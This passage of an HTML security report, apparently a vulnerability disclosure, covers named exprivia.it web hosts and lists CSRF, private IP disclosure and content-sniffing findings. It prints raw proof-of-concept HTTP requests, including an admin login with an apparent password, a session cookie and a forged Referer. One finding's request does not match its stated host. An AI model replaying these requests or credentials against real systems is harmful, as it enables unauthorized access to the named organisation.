          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseSev" aria-expanded="false" aria-controls="collapseSev">
            <span class="badge badge-default">Low</span> <b>Cross-site request forgery</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseSev" class="collapse" aria-labelledby="headingSev" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>http://elearning-ehit.exprivia.it</b></code><br>
  <b>Path</b>:<br>
  <code><b>/doceboLms/index.php</b></code><br>
  <b>Issue detail</b>:<br>
  <h4 class="text-danger">PLEAS BE CAUTIOUS: <b> THIS VULNERABILITY HAS BEEN CLASSIFIED AS LOW BECAUSE IT'S DIFFICULT TO BE EXPLOITED, BUT DON'T UNDERSTIMATE IT, AS IT COULD LEAD TO SERIOUS DAMAGE </b></h4><h5 class="text-success"><b>(Like gaining admin access/tokens/password or unwanted actions and lead to website/server takeover)</b></h5><br>
  The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.<br>
  The original request contains parameters that look like they may be anti-CSRF tokens. However the request is successful if these parameters (<b><code>authentic_request=1baedfb9efbc9da32ef1704c87cab86c</code></b>, <b><code>authentic_request=1baedfb9efbc9da32ef1704c87cab86c</code></b> and <b><code>login_pwd=adminese</code></b>) are removed and if a different host is put into <b><code>Referer</code></b> header name. <br><br>
  <pre>
  POST /doceboLms/index.php?modname=login&op=confirm&cachebust=1517654510.6 HTTP/1.1
  Host: nw85lq.elearning-ehit.exprivia.it
  Cache-Control: no-cache
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://elearning-ehit.exprivia.it/ /* replace with another host like http://kSdiBXJYCZvwimtCnFwahyt.it/ */
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 105
  Cookie: docebo_session=d2kl0g493nkmdu1a6i060o1p76
  DNT: 1
  Connection: close
  Upgrade-Insecure-Requests: 1

  authentic_request=1baedfb9efbc9da32ef1704c87cab86c&login_userid=admin&login_pwd=adminese&log_button=Login
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.1 302 Found
  Date: Sun, 11 Feb 2018 11:53:47 GMT
  Server: Apache/2.2.3 (Red Hat)
  X-Powered-By: PHP/5.3.3
  Location: http://nw85lq.elearning-ehit.exprivia.it/doceboLms/../doceboLms/index.php?modname=login&op=logout&msg=101
  Content-Length: 0
  Connection: close
  Content-Type: text/html; charset=UTF-8
  </p>
</pre>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingSix">
        <h5 class="mb-0">
          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseSix" aria-expanded="false" aria-controls="collapseSix">
            <span class="badge badge-default">Low</span> <b>Private IP addresses disclosed</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseSix" class="collapse" aria-labelledby="headingSix" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>http://www.rapportiniweb.exprivia.it</b></code><br>
  <b>Path</b>:<br>
  <code><b>/dotnetnuke/default.aspx</b></code><br>
  <b>Issue detail</b>:<br>
  The following RFC 1918 IP address was disclosed in the response: <b><code>10.6.5.2</code></b></li><br>
  <b>Issue background</b>:<br>
  RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organization, the private addresses used internally cannot usually be determined in the same ways.<br>
  Discovering the private addresses used within an organization can help an attacker in carrying out network-layer attacks aiming to penetrate the organization's internal infrastructure.<br><br>  
  <b>Proof of concept request</b>:
  <pre>
  POST /doceboLms/index.php?modname=login&op=confirm&cachebust=1517654510.6 HTTP/1.1
  Host: nw85lq.elearning-ehit.exprivia.it
  Cache-Control: no-cache
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://kSdiBXJYCZvwimtCnFwahyt.it/
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 105
  Cookie: docebo_session=********************
  DNT: 1
  Connection: close
  Upgrade-Insecure-Requests: 1

  login_userid=test&login_pwd=tester&log_button=Login
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.1 302 Found
  Date: Sat, 03 Feb 2018 03:41:24 GMT
  Server: Microsoft-IIS/6.0
  MicrosoftOfficeWebServer: 5.0_Pub
  X-Powered-By: ASP.NET
  X-AspNet-Version: 1.1.4322
  Location: http://www.rapportiniweb.exprivia.it/dotnetnuke/Default.aspx?tabid=36&error=Invalid_Viewstate%0d%0a%09Client+IP%3a+10.6.5.2%0d%0a%09Port%3a+48028%0d%0a%09User-Agent%3a+Mozilla%2f5.0+(X11%3b+Linux+x86_64%3b+rv%3a58.0)+Gecko%2f20100101+Firefox%2f58.0%0d%0a%09ViewState%3a+a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c%5b%5b%3f%24%7b%7b%25%7d%7dcake%5c%0d%0a%09Http-Referer%3a+http%3a%2f%2fwww.rapportiniweb.exprivia.it%2fdotnetnuke%2fdefault.aspx%0d%0a%09Path%3a+%2fdotnetnuke%2fdefault.aspx.&content=0

  <b>...[SNIP]...</b>
  &lt;html&gt;&lt;head&gt;&lt;title&gt;Object moved&lt;/title&gt;&lt;/head&gt;&lt;body&gt;
  &lt;h2&gt;Object moved to &lt;a href=&apos;http://www.rapportiniweb.exprivia.it/dotnetnuke/Default.aspx?tabid=36&amp;amp;error=Invalid_Viewstate%0d%0a%09Client+IP%3a+10.6.5.2%0d%0a%09Port%3a+48028%0d%0a%09User-Agent%3a+Mozilla%2f5.0+(X11%3b+Linux+x86_64%3b+rv%3a58.0)+Gecko%2f20100101+Firefox%2f58.0%0d%0a%09ViewState%3a+a&apos;a%5c&apos;b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c%5b%5b%3f%24%7b%7b%25%7d%7dcake%5c%0d%0a%09Http-Referer%3a+http%3a%2f%2fwww.rapportiniweb.exprivia.it%2fdotnetnuke%2fdefault.aspx%0d%0a%09Path%3a+%2fdotnetnuke%2fdefault.aspx.&amp;amp;content=0&apos;&gt;here&lt;/a&gt;.&lt;/h2&gt;
  &lt;/body&gt;&lt;/html&gt;
  </p>
</pre><br>
  <b>Screenshot</b>:<br>
  <img src="screens/exprivia-4.png"></p>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingEig">
        <h5 class="mb-0">
          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseEig" aria-expanded="false" aria-controls="collapseEig">
            <span class="badge badge-default">Low</span> <b>Content Sniffing not disabled</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseEig" class="collapse" aria-labelledby="headingEig" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>All</b></code><br>
  <b>Issue detail</b>:<br>
  There was no "X-Content-Type-Options" HTTP header with the value <var>nosniff</var> set in the response. The lack of this header causes that certain browsers, try to determine the content type and encoding of the response even when these properties are defined correctly. This can make the web application vulnerable against Cross-Site Scripting (XSS) attacks. E.g. the Internet Explorer and Safari treat responses with the content type text/plain as HTML, if they contain HTML tags.<br>
  <b>Proof of concept request</b>:
  <pre>
  GET /cas/login?service=https%3A%2F%2Fcms.exprivia.it%2Falfresco%2F HTTP/1.1
  Host: cas.exprivia.it
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://cms.exprivia.it/
  DNT: 1
  Connection: close
  Upgrade-Insecure-Requests: 1
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.1 200 OK
  Date: Sat, 03 Feb 2018 00:22:37 GMT
  Server: Apache-Coyote/1.1
  Pragma: No-cache
  Expires: Thu, 01 Jan 1970 00:00:00 GMT
  Cache-Control: no-cache
  Cache-Control: no-store
  Content-Type: text/html;charset=ISO-8859-1
  Content-Language: en-US
  Content-Length: 4988
  Set-Cookie: JSESSIONID=13FD2B789AE6B06D907E998644140360; Path=/cas; Secure
  Connection: close
  <b>...[SNIP]...</b>
  </p>
</pre><br>
        </div>
      </div>
    </div>
  </div>
  </div>
<div class="h-r"></div>
<div id="chartContainer" style="height: 400px; width: 100%;">
</div>
    <script src="scripts/jquery-3.1.1.slim.min.js"></script>
    <script src="scripts/tether.min.js"></script>
    <script src="scripts/bootstrap.min.js"></script>
    <script src="scripts/canvasjs.min.js"></script>
  </body>
</html>